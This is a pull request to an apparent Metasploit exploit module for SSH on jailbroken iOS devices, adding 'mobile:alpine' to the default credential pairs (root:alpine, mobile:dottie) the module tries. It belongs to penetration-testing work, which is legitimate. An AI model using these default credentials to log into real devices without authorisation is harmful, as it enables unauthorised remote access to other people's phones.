### PR TITLE
exploit/apple_ios/ssh/cydia_default_ssh: Add mobile:alpine creds

### DIFF
--- a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb
+++ b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Platform' => 'unix',
         'Arch' => ARCH_CMD,
         'Targets' => [
-          ['Apple iOS', { 'accounts' => [ [ 'root', 'alpine' ], [ 'mobile', 'dottie' ]] } ],
+          ['Apple iOS', { 'accounts' => [ [ 'root', 'alpine' ], [ 'mobile', 'dottie' ], ['mobile', 'alpine'] ] } ],
         ],
         'Privileged' => true,
         'DisclosureDate' => '2007-07-02',


### PR DESCRIPTION
Cydia is no longer maintained, but users are likely to still try this module, and `mobile:alpine` credentials are not unique to Cydia.